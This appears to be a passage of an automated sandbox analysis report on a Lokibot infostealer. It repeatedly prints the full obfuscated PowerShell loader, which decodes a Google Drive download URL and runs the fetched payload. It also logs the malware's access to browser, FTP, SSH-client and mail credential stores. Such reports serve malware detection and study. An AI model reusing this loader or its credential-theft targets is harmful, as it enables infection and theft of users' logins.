/Syresub2 Stjfor0 ueform1Tricaud0Paakal,0Mesmeri1Miljmyn0S uporh1Bagsder PseudofFFalangiiDaleswor Folkete etakinfPa,tagnoLeukocixSmearin/Partic 1Feudals2Skildre1Frdiggr. Bredba0Uforsta ';$Unpsychologically253=Refrig213 'OvereksU InvestsArticuleBaker.trDatasty-.edgrelASpulziegAnilinfeFemogtynEpithemtDet,nat ';$Cereals148=Refrig213 'JomfruthTippie,tFa,iaditIndolsspNiveauosSeriepr:Saetn n/Su.erbi/Deko.atd slitlirJulerosiGypterev SecreteAssis,e..entralgForkvi oSv,desto Buntmag Defilal VerdeneMesmeri.NringsvcIsoca,poWh.tewamHovedpr/ .ovorduPar,gracSqueaks?gravigreCobaltix ,trygepTrsteproUn ullerSomiklet forkar=ToldgrndSkuerr,ostatsmawPa oxysn MetriclTranspooBeerhouaHerrengdGard.ro&AlarmtiiDisqu,ldT.skeee=Luftlag1Re tallN DrivtmuFore.adRFalckcesProbity3 Tonic.3 GlummepRegel,tJin,ulcaX Evani,EDjvelsbZNglebenqSki.oppH reforgl Prmier9DesolatcSkjternIQuackstaIndru lf AflireO Poly.lpQualityy InteroaDivedam6CoolamouKalkeri7Skalpe IEnhedsp1Lin eluvBaggaarPTekstbeKBegoniaV Immome ';$modularization=Refrig213 'Steelwo>Meddele ';$Deviascope=Refrig213 ' InventiKara,sceSaftp.exDyretmm ';$Bundskrabets = Refrig213 'Ass mese,ilestocUsu apihJoini,goM.nksco majo,em% resultaPosto,tp Smu.hupGreekizdGru dtra SlaumptMithraiaVelgrer%Mirthf,\Tendensg PreseneTrykkernforbrusnUrkrfteeFrequenm SylteksPolyce.gGyri akn Ref,rmiPrecoolnOpret.eg gsindssAdskil,.antasteFTall,njaAcetoacsStartsy Stereot&Exodus &Gu.runn D.laasee .athogcmuriatehBaggingo Baptis Serozem$ vg.igh ';Medicinmands (Refrig213 'B ckpac$RrgtracgDalboarlbedrageoGrunthubBeecheraHaikunml Kilede:R agummG rundleShackinwImpardogElektroa Superlw ScatteyV,lenci=Milieuo(Unplatic KoalitmStamherdStjmaal Overcap/Ud lokkcPreopp Hyperbl$ThaumatBLeucon.uEditor n owdyisd CarroosNoedigtkH,nnahar Bo,seja PotmenbHfte.sse .onputt oestaus rals.o)Ennikes ');Medicinmands (Refrig213 ' Stabel$DominangIndvendlN,biimroSpexenebPlusrepaWithal,lSejrs,t:Irr.denn bis,ekyHandskem Sekun aCita.ioa MothernImpugnme Synga =Ecclesi$RetromaC ma.ufaeD,unmedrSindsbeeIgniti,aAre litlLed,teks.atteti1 Lyttas4Unresus8,eferti.Am Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\gennemsgnings.Fas && echo $" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Superexcrescence = 1;$Necroscopic18='Substrin';$Necroscopic18+='g';Function Refrig213($Kllert){$Ecstasy=$Kllert.Length-$Superexcrescence;For($Odeum119=7; $Odeum119 -lt $Ecstasy; $Odeum119+=(8)){$Gumminess+=$Kllert.$Necroscopic18.Invoke($Odeum119, $Superexcrescence);}$Gumminess;}function Medicinmands($Allodiaries){.($Deviascope) ($Allodiaries);}$Styggeres=Refrig213 ' GglendMCondensoRugekaszForkldniP okonsl Fe tivl MinimuaBasioph/ Skopu,5Protoc .Si,vanu0Oilwell Oversu (arkitekWPincushiMultiman BordindProgramo.endarmwLitesbes Trolje BogtilNAa.nersT Disput Insta.1Thegidd0typhloe.Luftrum0.onglet;Manipul firmaaWOrderleioutpuncnUn.idyu6 Procta4Anguish; A.tito Haandstx S heno6Finvask4Alle dy;Sidevae ParamyorPhrensivTransfo:melania1Dejeune2Curatis1,efrica.Organ.s0Jeanell)Townsid GrundliGD rklore WillsecForfaldkKejsereomaledi /Syresub2 Stjfor0 ueform1Tricaud0Paakal,0Mesmeri1Miljmyn0S uporh1Bagsder PseudofFFalangiiDaleswor Folkete etakinfPa,tagnoLeukocixSmearin/Partic 1Feudals2Skildre1Frdiggr. Bredba0Uforsta ';$Unpsychologically253=Refrig213 'OvereksU InvestsArticuleBaker.trDatasty-.edgrelASpulziegAnilinfeFemogtynEpithemtDet,nat ';$Cereals148=Refrig213 'JomfruthTippie,tFa,iaditIndolsspNiveauosSeriepr:Saetn n/Su.erbi/Deko.atd slitlirJulerosiGypterev SecreteAssis,e..entralgForkvi oSv,desto Buntmag Defilal VerdeneMesmeri.NringsvcIsoca,poWh.tewamHovedpr/ .ovorduPar,gracSqueaks?gravigreCobaltix ,trygepTrsteproUn ullerSomiklet forkar=ToldgrndSkuerr,ostatsmawPa oxysn MetriclTranspooBeerhouaHerrengdGard.ro&AlarmtiiDisqu,ldT.skeee=Luftlag1Re tallN DrivtmuFore.adRFalckcesProbity3 Tonic.3 GlummepRegel,tJin,ulcaX Evani,EDjvelsbZNglebenqSki.oppH reforgl Prmier9DesolatcSkjternIQuackstaIndru lf AflireO Poly.lpQualityy InteroaDivedam6CoolamouKalkeri7Skalpe IEnhedsp1Lin eluvBaggaarPTekstbeKBegoniaV Immome ';$modularization=Refrig213 'Steelwo>Meddele ';$Deviascope=Refrig213 ' InventiKara,sceSaftp.exDyretmm ';$Bundskrabets = Refrig213 'Ass mese,ilestocUsu apihJoini,goM.nksco majo,em% resultaPosto,tp Smu.hupGreekizdGru dtra SlaumptMithraiaVelgrer%Mirthf,\Tendensg PreseneTrykkernforbrusnUrkrfteeFrequenm SylteksPolyce.gGyri akn Ref,rmiPrecoolnOpret.eg gsindssAdskil,.antasteFTall,njaAcetoacsStartsy Stereot&Exodus &Gu.runn D.laasee .athogcmuriatehBaggingo Baptis Serozem$ vg.igh ';Medicinmands (Refrig213 'B ckpac$RrgtracgDalboarlbedrageoGrunthubBeecheraHaikunml Kilede:R agummG rundleShackinwImpardogElektroa Superlw ScatteyV,lenci=Milieuo(Unplatic KoalitmStamherdStjmaal Overcap/Ud lokkcPreopp Hyperbl$ThaumatBLeucon.uEditor n owdyisd CarroosNoedigtkH,nnahar Bo,seja PotmenbHfte.sse .onputt oestaus rals.o)Ennikes ');Medicinmands (Refrig213 ' Stabel$DominangIndvendlN,biimroSpexenebPlusrepaWithal,lSejrs,t:Irr.denn bis,ekyHandskem Sekun aCita.ioa MothernImpugnme Synga =Ecclesi$RetromaC ma.ufaeD,unmedrSindsbeeIgniti,aAre litlLed,teks.atteti1 Lyttas4Unresus8,eferti.Am Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\gennemsgnings.Fas && echo $" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$superexcrescence = 1;$necroscopic18='substrin';$necroscopic18+='g';function refrig213($kllert){$ecstasy=$kllert.length-$superexcrescence;for($odeum119=7; $odeum119 -lt $ecstasy; $odeum119+=(8)){$gumminess+=$kllert.$necroscopic18.invoke($odeum119, $superexcrescence);}$gumminess;}function medicinmands($allodiaries){.($deviascope) ($allodiaries);}$styggeres=refrig213 ' gglendmcondensorugekaszforkldnip okonsl fe tivl minimuabasioph/ skopu,5protoc .si,vanu0oilwell oversu (arkitekwpincushimultiman bordindprogramo.endarmwlitesbes trolje bogtilnaa.nerst disput insta.1thegidd0typhloe.luftrum0.onglet;manipul firmaaworderleioutpuncnun.idyu6 procta4anguish; a.tito haandstx s heno6finvask4alle dy;sidevae paramyorphrensivtransfo:melania1dejeune2curatis1,efrica.organ.s0jeanell)townsid grundligd rklore willsecforfaldkkejsereomaledi /syresub2 stjfor0 ueform1tricaud0paakal,0mesmeri1miljmyn0s uporh1bagsder pseudofffalangiidaleswor folkete etakinfpa,tagnoleukocixsmearin/partic 1feudals2skildre1frdiggr. bredba0uforsta ';$unpsychologically253=refrig213 'overeksu investsarticulebaker.trdatasty-.edgrelaspulzieganilinfefemogtynepithemtdet,nat ';$cereals148=refrig213 'jomfruthtippie,tfa,iaditindolsspniveauosseriepr:saetn n/su.erbi/deko.atd slitlirjulerosigypterev secreteassis,e..entralgforkvi osv,desto buntmag defilal verdenemesmeri.nringsvcisoca,powh.tewamhovedpr/ .ovordupar,gracsqueaks?gravigrecobaltix ,trygeptrsteproun ullersomiklet forkar=toldgrndskuerr,ostatsmawpa oxysn metricltranspoobeerhouaherrengdgard.ro&alarmtiidisqu,ldt.skeee=luftlag1re talln drivtmufore.adrfalckcesprobity3 tonic.3 glummepregel,tjin,ulcax evani,edjvelsbznglebenqski.opph reforgl prmier9desolatcskjterniquackstaindru lf aflireo poly.lpqualityy interoadivedam6coolamoukalkeri7skalpe ienhedsp1lin eluvbaggaarptekstbekbegoniav immome ';$modularization=refrig213 'steelwo>meddele ';$deviascope=refrig213 ' inventikara,scesaftp.exdyretmm ';$bundskrabets = refrig213 'ass mese,ilestocusu apihjoini,gom.nksco majo,em% resultaposto,tp smu.hupgreekizdgru dtra slaumptmithraiavelgrer%mirthf,\tendensg presenetrykkernforbrusnurkrfteefrequenm syltekspolyce.ggyri akn ref,rmiprecoolnopret.eg gsindssadskil,.antasteftall,njaacetoacsstartsy stereot&exodus &gu.runn d.laasee .athogcmuriatehbaggingo baptis serozem$ vg.igh ';medicinmands (refrig213 'b ckpac$rrgtracgdalboarlbedrageogrunthubbeecherahaikunml kilede:r agummg rundleshackinwimpardogelektroa superlw scatteyv,lenci=milieuo(unplatic koalitmstamherdstjmaal overcap/ud lokkcpreopp hyperbl$thaumatbleucon.ueditor n owdyisd carroosnoedigtkh,nnahar bo,seja potmenbhfte.sse .onputt oestaus rals.o)ennikes ');medicinmands (refrig213 ' stabel$dominangindvendln,biimrospexenebplusrepawithal,lsejrs,t:irr.denn bis,ekyhandskem sekun acita.ioa mothernimpugnme synga =ecclesi$retromac ma.ufaed,unmedrsindsbeeigniti,aare litlled,teks.atteti1 lyttas4unresus8,eferti.am
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$superexcrescence = 1;$necroscopic18='substrin';$necroscopic18+='g';function refrig213($kllert){$ecstasy=$kllert.length-$superexcrescence;for($odeum119=7; $odeum119 -lt $ecstasy; $odeum119+=(8)){$gumminess+=$kllert.$necroscopic18.invoke($odeum119, $superexcrescence);}$gumminess;}function medicinmands($allodiaries){.($deviascope) ($allodiaries);}$styggeres=refrig213 ' gglendmcondensorugekaszforkldnip okonsl fe tivl minimuabasioph/ skopu,5protoc .si,vanu0oilwell oversu (arkitekwpincushimultiman bordindprogramo.endarmwlitesbes trolje bogtilnaa.nerst disput insta.1thegidd0typhloe.luftrum0.onglet;manipul firmaaworderleioutpuncnun.idyu6 procta4anguish; a.tito haandstx s heno6finvask4alle dy;sidevae paramyorphrensivtransfo:melania1dejeune2curatis1,efrica.organ.s0jeanell)townsid grundligd rklore willsecforfaldkkejsereomaledi /syresub2 stjfor0 ueform1tricaud0paakal,0mesmeri1miljmyn0s uporh1bagsder pseudofffalangiidaleswor folkete etakinfpa,tagnoleukocixsmearin/partic 1feudals2skildre1frdiggr. bredba0uforsta ';$unpsychologically253=refrig213 'overeksu investsarticulebaker.trdatasty-.edgrelaspulzieganilinfefemogtynepithemtdet,nat ';$cereals148=refrig213 'jomfruthtippie,tfa,iaditindolsspniveauosseriepr:saetn n/su.erbi/deko.atd slitlirjulerosigypterev secreteassis,e..entralgforkvi osv,desto buntmag defilal verdenemesmeri.nringsvcisoca,powh.tewamhovedpr/ .ovordupar,gracsqueaks?gravigrecobaltix ,trygeptrsteproun ullersomiklet forkar=toldgrndskuerr,ostatsmawpa oxysn metricltranspoobeerhouaherrengdgard.ro&alarmtiidisqu,ldt.skeee=luftlag1re talln drivtmufore.adrfalckcesprobity3 tonic.3 glummepregel,tjin,ulcax evani,edjvelsbznglebenqski.opph reforgl prmier9desolatcskjterniquackstaindru lf aflireo poly.lpqualityy interoadivedam6coolamoukalkeri7skalpe ienhedsp1lin eluvbaggaarptekstbekbegoniav immome ';$modularization=refrig213 'steelwo>meddele ';$deviascope=refrig213 ' inventikara,scesaftp.exdyretmm ';$bundskrabets = refrig213 'ass mese,ilestocusu apihjoini,gom.nksco majo,em% resultaposto,tp smu.hupgreekizdgru dtra slaumptmithraiavelgrer%mirthf,\tendensg presenetrykkernforbrusnurkrfteefrequenm syltekspolyce.ggyri akn ref,rmiprecoolnopret.eg gsindssadskil,.antasteftall,njaacetoacsstartsy stereot&exodus &gu.runn d.laasee .athogcmuriatehbaggingo baptis serozem$ vg.igh ';medicinmands (refrig213 'b ckpac$rrgtracgdalboarlbedrageogrunthubbeecherahaikunml kilede:r agummg rundleshackinwimpardogelektroa superlw scatteyv,lenci=milieuo(unplatic koalitmstamherdstjmaal overcap/ud lokkcpreopp hyperbl$thaumatbleucon.ueditor n owdyisd carroosnoedigtkh,nnahar bo,seja potmenbhfte.sse .onputt oestaus rals.o)ennikes ');medicinmands (refrig213 ' stabel$dominangindvendln,biimrospexenebplusrepawithal,lsejrs,t:irr.denn bis,ekyhandskem sekun acita.ioa mothernimpugnme synga =ecclesi$retromac ma.ufaed,unmedrsindsbeeigniti,aare litlled,teks.atteti1 lyttas4unresus8,eferti.am
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$superexcrescence = 1;$necroscopic18='substrin';$necroscopic18+='g';function refrig213($kllert){$ecstasy=$kllert.length-$superexcrescence;for($odeum119=7; $odeum119 -lt $ecstasy; $odeum119+=(8)){$gumminess+=$kllert.$necroscopic18.invoke($odeum119, $superexcrescence);}$gumminess;}function medicinmands($allodiaries){.($deviascope) ($allodiaries);}$styggeres=refrig213 ' gglendmcondensorugekaszforkldnip okonsl fe tivl minimuabasioph/ skopu,5protoc .si,vanu0oilwell oversu (arkitekwpincushimultiman bordindprogramo.endarmwlitesbes trolje bogtilnaa.nerst disput insta.1thegidd0typhloe.luftrum0.onglet;manipul firmaaworderleioutpuncnun.idyu6 procta4anguish; a.tito haandstx s heno6finvask4alle dy;sidevae paramyorphrensivtransfo:melania1dejeune2curatis1,efrica.organ.s0jeanell)townsid grundligd rklore willsecforfaldkkejsereomaledi /syresub2 stjfor0 ueform1tricaud0paakal,0mesmeri1miljmyn0s uporh1bagsder pseudofffalangiidaleswor folkete etakinfpa,tagnoleukocixsmearin/partic 1feudals2skildre1frdiggr. bredba0uforsta ';$unpsychologically253=refrig213 'overeksu investsarticulebaker.trdatasty-.edgrelaspulzieganilinfefemogtynepithemtdet,nat ';$cereals148=refrig213 'jomfruthtippie,tfa,iaditindolsspniveauosseriepr:saetn n/su.erbi/deko.atd slitlirjulerosigypterev secreteassis,e..entralgforkvi osv,desto buntmag defilal verdenemesmeri.nringsvcisoca,powh.tewamhovedpr/ .ovordupar,gracsqueaks?gravigrecobaltix ,trygeptrsteproun ullersomiklet forkar=toldgrndskuerr,ostatsmawpa oxysn metricltranspoobeerhouaherrengdgard.ro&alarmtiidisqu,ldt.skeee=luftlag1re talln drivtmufore.adrfalckcesprobity3 tonic.3 glummepregel,tjin,ulcax evani,edjvelsbznglebenqski.opph reforgl prmier9desolatcskjterniquackstaindru lf aflireo poly.lpqualityy interoadivedam6coolamoukalkeri7skalpe ienhedsp1lin eluvbaggaarptekstbekbegoniav immome ';$modularization=refrig213 'steelwo>meddele ';$deviascope=refrig213 ' inventikara,scesaftp.exdyretmm ';$bundskrabets = refrig213 'ass mese,ilestocusu apihjoini,gom.nksco majo,em% resultaposto,tp smu.hupgreekizdgru dtra slaumptmithraiavelgrer%mirthf,\tendensg presenetrykkernforbrusnurkrfteefrequenm syltekspolyce.ggyri akn ref,rmiprecoolnopret.eg gsindssadskil,.antasteftall,njaacetoacsstartsy stereot&exodus &gu.runn d.laasee .athogcmuriatehbaggingo baptis serozem$ vg.igh ';medicinmands (refrig213 'b ckpac$rrgtracgdalboarlbedrageogrunthubbeecherahaikunml kilede:r agummg rundleshackinwimpardogelektroa superlw scatteyv,lenci=milieuo(unplatic koalitmstamherdstjmaal overcap/ud lokkcpreopp hyperbl$thaumatbleucon.ueditor n owdyisd carroosnoedigtkh,nnahar bo,seja potmenbhfte.sse .onputt oestaus rals.o)ennikes ');medicinmands (refrig213 ' stabel$dominangindvendln,biimrospexenebplusrepawithal,lsejrs,t:irr.denn bis,ekyhandskem sekun acita.ioa mothernimpugnme synga =ecclesi$retromac ma.ufaed,unmedrsindsbeeigniti,aare litlled,teks.atteti1 lyttas4unresus8,eferti.am Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$superexcrescence = 1;$necroscopic18='substrin';$necroscopic18+='g';function refrig213($kllert){$ecstasy=$kllert.length-$superexcrescence;for($odeum119=7; $odeum119 -lt $ecstasy; $odeum119+=(8)){$gumminess+=$kllert.$necroscopic18.invoke($odeum119, $superexcrescence);}$gumminess;}function medicinmands($allodiaries){.($deviascope) ($allodiaries);}$styggeres=refrig213 ' gglendmcondensorugekaszforkldnip okonsl fe tivl minimuabasioph/ skopu,5protoc .si,vanu0oilwell oversu (arkitekwpincushimultiman bordindprogramo.endarmwlitesbes trolje bogtilnaa.nerst disput insta.1thegidd0typhloe.luftrum0.onglet;manipul firmaaworderleioutpuncnun.idyu6 procta4anguish; a.tito haandstx s heno6finvask4alle dy;sidevae paramyorphrensivtransfo:melania1dejeune2curatis1,efrica.organ.s0jeanell)townsid grundligd rklore willsecforfaldkkejsereomaledi /syresub2 stjfor0 ueform1tricaud0paakal,0mesmeri1miljmyn0s uporh1bagsder pseudofffalangiidaleswor folkete etakinfpa,tagnoleukocixsmearin/partic 1feudals2skildre1frdiggr. bredba0uforsta ';$unpsychologically253=refrig213 'overeksu investsarticulebaker.trdatasty-.edgrelaspulzieganilinfefemogtynepithemtdet,nat ';$cereals148=refrig213 'jomfruthtippie,tfa,iaditindolsspniveauosseriepr:saetn n/su.erbi/deko.atd slitlirjulerosigypterev secreteassis,e..entralgforkvi osv,desto buntmag defilal verdenemesmeri.nringsvcisoca,powh.tewamhovedpr/ .ovordupar,gracsqueaks?gravigrecobaltix ,trygeptrsteproun ullersomiklet forkar=toldgrndskuerr,ostatsmawpa oxysn metricltranspoobeerhouaherrengdgard.ro&alarmtiidisqu,ldt.skeee=luftlag1re talln drivtmufore.adrfalckcesprobity3 tonic.3 glummepregel,tjin,ulcax evani,edjvelsbznglebenqski.opph reforgl prmier9desolatcskjterniquackstaindru lf aflireo poly.lpqualityy interoadivedam6coolamoukalkeri7skalpe ienhedsp1lin eluvbaggaarptekstbekbegoniav immome ';$modularization=refrig213 'steelwo>meddele ';$deviascope=refrig213 ' inventikara,scesaftp.exdyretmm ';$bundskrabets = refrig213 'ass mese,ilestocusu apihjoini,gom.nksco majo,em% resultaposto,tp smu.hupgreekizdgru dtra slaumptmithraiavelgrer%mirthf,\tendensg presenetrykkernforbrusnurkrfteefrequenm syltekspolyce.ggyri akn ref,rmiprecoolnopret.eg gsindssadskil,.antasteftall,njaacetoacsstartsy stereot&exodus &gu.runn d.laasee .athogcmuriatehbaggingo baptis serozem$ vg.igh ';medicinmands (refrig213 'b ckpac$rrgtracgdalboarlbedrageogrunthubbeecherahaikunml kilede:r agummg rundleshackinwimpardogelektroa superlw scatteyv,lenci=milieuo(unplatic koalitmstamherdstjmaal overcap/ud lokkcpreopp hyperbl$thaumatbleucon.ueditor n owdyisd carroosnoedigtkh,nnahar bo,seja potmenbhfte.sse .onputt oestaus rals.o)ennikes ');medicinmands (refrig213 ' stabel$dominangindvendln,biimrospexenebplusrepawithal,lsejrs,t:irr.denn bis,ekyhandskem sekun acita.ioa mothernimpugnme synga =ecclesi$retromac ma.ufaed,unmedrsindsbeeigniti,aare litlled,teks.atteti1 lyttas4unresus8,eferti.am Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected Lokibot
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 00000009.00000002.3336499423.00000000054C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: wab.exe PID: 5496, type: MEMORYSTR
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Tries to harvest and steal ftp login credentials
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook Jump to behavior

Remote Access Functionality
barindex
Yara detected Lokibot
